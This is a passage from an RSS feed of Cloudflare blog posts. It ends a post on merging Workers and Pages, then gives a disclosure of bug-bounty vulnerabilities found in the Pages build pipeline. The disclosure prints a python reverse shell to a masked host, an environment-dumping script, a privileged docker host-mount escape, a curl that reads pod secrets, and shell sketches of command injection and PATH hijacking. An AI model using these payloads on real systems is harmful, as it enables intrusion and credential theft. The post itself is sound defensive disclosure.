    <p>With Workers and Pages converging, we’re not just unlocking all the golden developer features of each product into one development platform. We’re bringing all the performance, cost, and load benefits too. This includes:</p><ul><li><p><b>Super low latency</b> with globally distributed static assets and compute on our network, which is just 50 ms away from 95% of the world’s Internet-connected population.</p></li><li><p><b>Free egress</b> and free static asset hosting.</p></li><li><p><b>Standards-based JavaScript runtime</b> with seamless compatibility across the packages and libraries you're already familiar with.</p></li></ul>
    <div>
      <h2>Seamless migrations for all</h2>
      <a href="#seamless-migrations-for-all">
        
      </a>
    </div>
    <p>If you’re already a Pages or Workers user and are starting to get nervous about what this means for your existing projects – never fear. As we build out this merged architecture, seamless migration is our top priority and the North Star for every step on the way to a unified development platform. Existing projects on both Pages and Workers will continue to work without users needing to lift a finger. Instead, you'll see more and more features become available to enrich your existing projects and workflows, regardless of the product you started with.</p>
    <div>
      <h2>What’s new today?</h2>
      <a href="#whats-new-today">
        
      </a>
    </div>
    <p>We’ll be working over the next year to converge Pages and Workers into one singular experience, blending not only the products themselves but also our product, engineering and design teams behind the scenes.</p><p>While we can’t wait to welcome you to the new converged world, this change unfortunately won’t happen overnight. We’re planning to hit some big but incremental milestones over the next few quarters to ensure a smooth transition into convergence, and this Developer Week, we’re excited to take our first step toward convergence. In the dashboard, things might feel a bit different!</p>
    <div>
      <h3>Get started together</h3>
      <a href="#get-started-together">
        
      </a>
    </div>
    <p>Combining the onboarding experience for Pages and Workers into one flow, you’ll notice some changes on our dashboard when you’re creating a project. We’re slowly bringing the two products closer together by unifying the creation flow, giving you the ability to create either a Pages project or a Worker from one screen.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1puZCEGhC57tvtVrZelPxQ/7a2dce2d00e60a04494c2877e0c78ebb/image2-25.png" />
            
            </figure>
    <div>
      <h3>Go faster with templates</h3>
      <a href="#go-faster-with-templates">
        
      </a>
    </div>
    <p>We understand the classic developer urge to get your hands dirty immediately and hit the ground running on your big vision. We’re making it easier than ever to go from an idea to an application that’s live on the Cloudflare network. In a couple of clicks, you can deploy a starter template, ranging from a simple Hello World Worker to a ChatGPT plugin. We’re also working on Pages templates for our dashboard, which will allow you to automatically create a new repo and deploy a starter full-stack app in just a couple of clicks.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3rE4bQXXGIVLL1GJHRwp7K/689712caa64a9898a9e1d1cec23f9530/image6-8.png" />
            
            </figure>
    <div>
      <h3>Your favorite full stack frameworks at your fingertips</h3>
      <a href="#your-favorite-full-stack-frameworks-at-your-fingertips">
        
      </a>
    </div>
    <p>We're not stopping with static templates or our dashboard either. Bringing the framework of your choice doesn't mean you have to leave behind the tools you already know and love. If you’re itching to see just what we mean when we say “deploy with your favorite full-stack framework” or “check out the power of Workers”, simply execute:</p>
            <pre><code>npm create cloudflare@latest</code></pre>
            <p>from your terminal and enjoy the ride! This <a href="/making-cloudflare-for-web">new CLI experience integrates</a> with the CLIs of some of our first-class, solidly supported full-stack frameworks like Angular, Next, Qwik, and Remix, giving you full control of how you create new projects. From this tool you can also deploy a variety of Workers using our powerful starter templates, with a wizard-like experience.</p>
    <div>
      <h3>One singular place to find all of your applications</h3>
      <a href="#one-singular-place-to-find-all-of-your-applications">
        
      </a>
    </div>
    <p>We’re taking one step closer to a unified experience by merging the Pages and Workers project list dashboards together. Once you’ve deployed your application, you’ll notice all of your Pages and Workers on one page, so you don’t have to navigate to different parts of your dashboard. Track your usage analytics for Workers / Pages Functions in one spot. In the future, these cards won’t be identifiable as Pages and Workers – just “projects” with a combination of assets, functions and resources!</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ecIiaeqYcjq16PZ0zuHu8/961af03314a1308f9deedd301a007fe4/image3-14.png" />
            
            </figure>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>As we begin executing, you’ll notice each product slowly become more and more similar as we unlock features for each platform until they’re ready to be one: features such as git integration for your Workers and a config file for your Pages projects!</p><p>Keep an eye out on <a href="https://twitter.com/CloudflareDev">Twitter</a> to hear about the newest capabilities and more on what’s to come in every milestone.</p>
    <div>
      <h2>Have thoughts?</h2>
      <a href="#have-thoughts">
        
      </a>
    </div>
    <p>Of course, we wouldn’t be able to build an amazing platform without first listening to the voice of our community. In fact, <a href="https://docs.google.com/forms/d/1I48UoUpCH6GS1pkZJ_B0W-lTXqn1LeoHp8ILJlRo5dY/viewform?edit_requested=true">we’ve put together a survey</a> to collect more information about our users and receive input on what you’d like to see. If you have a few minutes, you can fill it out or reach out to us on the <a href="https://discord.com/invite/cloudflaredev">Cloudflare Developers Discord</a> or <a href="https://twitter.com/cloudflaredev">Twitter @CloudflareDev</a>.</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">13ljyrS4VKTddHw6qlhWyw</guid>
            <dc:creator>Nevi Shah</dc:creator>
            <dc:creator>Natalie Rogers</dc:creator>
        </item>
        <item>
            <title><![CDATA[The Cloudflare Bug Bounty program and Cloudflare Pages]]></title>
            <link>https://blog.cloudflare.com/pages-bug-bounty/</link>
            <pubDate>Fri, 06 May 2022 13:00:00 GMT</pubDate>
            <description><![CDATA[ The Cloudflare Bug Bounty has resulted in numerous security improvements to Cloudflare Pages ]]></description>
            <content:encoded><![CDATA[ <p><i>The Cloudflare Pages team recently collaborated closely with security researchers at</i> <a href="https://assetnote.io/"><i>Assetnote</i></a> <i>through our</i> <a href="https://hackerone.com/cloudflare"><i>Public Bug Bounty</i></a><i>. Throughout the process we found and fully patched the vulnerabilities discovered in Cloudflare Pages. You can read their detailed</i> <a href="https://blog.assetnote.io/2022/05/06/cloudflare-pages-pt1/"><i>write-up here</i></a><i>. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and also highlight the bug bounty program that helps make our products more secure.</i></p><p>Cloudflare cares deeply about security and about protecting our users and customers — in fact, it’s a big part of the reason we’re here. How does this manifest in how we run our business? In a number of ways. One very important prong is our <a href="/cloudflare-bug-bounty-program/">bug bounty program</a>, which facilitates and rewards security researchers’ collaboration with us.</p><p>But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.</p><p>Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.</p><p>In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to <a href="http://hackerone.com/cloudflare">use the bounty program</a> to work with us to help make our services — and by extension the Internet — more secure!</p>
    <div>
      <h2>What happens when a vulnerability is reported?</h2>
      <a href="#what-happens-when-a-vulnerability-is-reported">
        
      </a>
    </div>
    <p>Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:</p><ol><li><p>We investigate the issue to understand the criticality of the report.</p></li><li><p>We work with the engineering teams to scope, implement, and validate a fix. For urgent problems we start working with engineering immediately, while less urgent issues are tracked and prioritized alongside engineering’s normal bug-fixing cadences.</p></li><li><p>Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.</p></li></ol><p>This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.</p>
    <div>
      <h2>What was discovered in Cloudflare Pages?</h2>
      <a href="#what-was-discovered-in-cloudflare-pages">
        
      </a>
    </div>
    <p>The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">CI/CD build pipeline</a>): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through the researchers’ reports, it became clear that our initial build architecture decisions provided too large an <a href="https://www.cloudflare.com/learning/security/what-is-an-attack-surface/">attack surface</a>. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.</p><p>When determining impact, it is not enough to find no evidence that a bug was exploited; <i>we must conclusively prove that it was not exploited</i>. For almost all the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively against activity by trusted security researchers.</p><p>However, for one bug, <i>while we found no evidence that the bug was exploited beyond the work of security researchers</i>, we were not able to meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.</p><p>Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.</p>
    <div>
      <h3>Bug 1: Command injection in CLONE_REPO</h3>
      <a href="#bug-1-command-injection-in-clone_repo">
        
      </a>
    </div>
    <p>A flaw in our logic during build initialization made it possible to execute arbitrary code, echo environment variables to a file, and then read the contents of that file.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4xCsRLGOMLRsVRAAbQBjXM/98cc4254afa79a1e21b503f2a3cb94a4/image2-1.png" />
            
            </figure><p>The crux of the bug was that <code>root_dir</code> in this line of code was attacker controlled. The researcher was able to craft a malicious <code>root_dir</code> that dumped the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key, which would have allowed the attacker to read the repositories of other Pages customers, many of which are private.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/61X1OXGLWGeBCkSmeQb8nj/275441334f56e028dd27971b642a2317/image1-6.png" />
            
            </figure><p>After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by any other (potentially malicious) actors. Our logs showed that this was the first time this particular attack had ever been performed, and that it was responsibly reported.</p>
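<p>The shape of this bug class can be sketched in a few lines of shell. The snippet below is a hypothetical, simplified reproduction — the variable names and fake secret are made up, and this is not Cloudflare’s actual build code: an attacker-controlled value is expanded inside a shell command string, so shell metacharacters inside it execute as extra commands.</p>

```shell
#!/bin/sh
# Hypothetical sketch of the Bug 1 pattern; not Cloudflare's real code.
# A secret in the build process's environment stands in for the GitHub
# bot's authorization key.
export SECRET_TOKEN="fake-gh-bot-key"

# Attacker-controlled "root directory": the semicolon ends the intended
# command, and the rest runs as a second command that dumps the
# environment (secret included) to a file.
root_dir='repo; export -p > envvars.txt'

# Vulnerable pattern: the untrusted value is expanded into shell text.
sh -c "echo cloning into $root_dir"

# Safer pattern: pass the value as a positional argument so it is never
# re-parsed as shell syntax.
sh -c 'echo cloning into "$1"' _ "$root_dir"
```

<p>Running the vulnerable line leaves <code>envvars.txt</code> containing <code>SECRET_TOKEN</code>; the safer form simply prints the malicious string as data.</p>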
    <div>
      <h3>Bug 2: Command injection in PUBLISH_ASSETS</h3>
      <a href="#bug-2-command-injection-in-publish_assets">
        
      </a>
    </div>
    <p>This bug was nearly identical to the first one, but in the publishing step instead of the clone step. We went to work fixing the input validation issues and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research being performed.</p>
    <div>
      <h3>Bug 3: Cloudflare API key disclosure in the asset publishing process</h3>
      <a href="#bug-3-cloudflare-api-key-disclosure-in-the-asset-publishing-process">
        
      </a>
    </div>
    <p>While building customer pages, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had Linux permissions of 777, allowing all users on the machine to read the program, execute the program and, most importantly, overwrite the program. If you can overwrite the program before its next invocation, your code runs with whatever permissions the next caller has.</p><p>In this case the attack is simple: when a Pages build runs, the following <code>build.sh</code> is specified to run, and it overwrites the executable with a new one.</p>
            <pre><code>#!/bin/bash
cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator</code></pre>
            <p>This allows the attacker to provide their own <code>pages-metadata-generator</code> program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.</p>
            <pre><code>#!/bin/bash
echo "henlo fren"
export &gt; /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'</code></pre>
            <p>With a reverse shell, the attacker only needs to run <code>env</code> to see the environment variables that the program was invoked with. We fixed the file permissions of the program, rotated the credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.</p>
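<p>The world-writable binary problem can be reproduced in miniature with a throwaway script (the file names here are illustrative, not the real build hosts): any executable with mode 777 on a shared machine can be swapped out by a co-tenant between invocations.</p>

```shell
#!/bin/sh
# Hypothetical sketch of the Bug 3 pattern; names are made up.
# A shared tool is installed with mode 777, writable by every user.
printf '#!/bin/sh\necho real-tool\n' > shared-tool
chmod 0777 shared-tool

# Any co-tenant build can replace it before the next invocation.
printf '#!/bin/sh\necho attacker-code\n' > shared-tool

./shared-tool                 # now runs the attacker's program

# The fix: owner-writable only, so other users cannot overwrite it.
chmod 0755 shared-tool
```

<p>On the real hosts the danger was not the overwrite itself but the next caller: whoever invoked the tool next ran the attacker’s code with a fully populated set of environment variables.</p>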
    <div>
      <h3>Bug 4: Bash path injection</h3>
      <a href="#bug-4-bash-path-injection">
        
      </a>
    </div>
    <p>This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.</p><p><code>PATH=/opt/buildhome/.swiftenv/bin:/opt/buildhome/.swiftenv/shims:/opt/buildhome/.php:/opt/buildhome/.binrc/bin:/usr/local/rvm/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/buildhome/.cask/bin:/opt/buildhome/.gimme/bin:/opt/buildhome/.dotnet/tools:/opt/buildhome/.dotnet</code></p><p>Unfortunately, not all of these directories had the proper filesystem permissions, allowing a malicious version of the <code>bash</code> program to be written to one of them and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.</p>
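<p>The PATH variant of the same problem can be sketched like this (the directory and tool names are invented for illustration): command lookup walks PATH left to right, so a writable directory that appears before the real binary’s directory lets an attacker shadow that binary.</p>

```shell
#!/bin/sh
# Hypothetical sketch of the Bug 4 pattern; names are made up.
# Simulate a writable directory that appears early on the build's PATH.
mkdir -p writable-bin
printf '#!/bin/sh\necho planted\n' > writable-bin/sometool
chmod +x writable-bin/sometool

# Because the writable directory resolves first, lookups for "sometool"
# find the planted binary instead of any copy later on the path.
PATH="$PWD/writable-bin:$PATH" sometool
```

<p>In the reported bug the planted program was a malicious <code>bash</code>, which the Pages build process later invoked.</p>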
    <div>
      <h3>Bug 5: Azure pipelines escape</h3>
      <a href="#bug-5-azure-pipelines-escape">
        
      </a>
    </div>
    <p>Back when this research was conducted, we were running Cloudflare Pages on Azure Pipelines. Builds took place in highly privileged containers, and the containers had the Docker socket available to them. Once the researchers had root within these containers, escaping them was trivial after installing docker and mounting the root directory of the host machine.</p>
            <pre><code>sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest</code></pre>
            <p>Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host which gave access to the Azure Organization that Cloudflare Pages was running within.</p><p>The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.</p>
    <div>
      <h3>Bug 6: Pages on Kubernetes</h3>
      <a href="#bug-6-pages-on-kubernetes">
        
      </a>
    </div>
    <p>After receiving the above reports, we decided to change the architecture of Pages. One of these changes was migrating the product from Azure to Kubernetes and simplifying the workflow, so that the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds run within Kubernetes Pods and are seeded with the minimum set of credentials needed.</p><p>As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to <code>curl</code> the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).</p>
            <pre><code>curl -v -k http://10.124.200.1:10255/pods</code></pre>
            <p>We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages' customers.</p><p>In the previously reported issues we had robust logs that showed us that the attacks that were being performed had never been performed by anyone else. The logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.</p>
    <div>
      <h2>Takeaways</h2>
      <a href="#takeaways">
        
      </a>
    </div>
    <p>We are thankful for all the security research performed on our Pages product at such incredible depth. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research and to work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on <a href="https://blog.assetnote.io/2022/05/06/cloudflare-pages-pt1/">their website</a>.</p><p>More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.</p><p>Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out <a href="https://hackerone.com/cloudflare">hackerone.com/cloudflare</a> for more info!</p>
            <category><![CDATA[Bug Bounty]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">1EuGlcHFo9aPl8DaujMbpQ</guid>
            <dc:creator>Evan Johnson</dc:creator>
            <dc:creator>Natalie Rogers</dc:creator>
        </item>
    </channel>
</rss>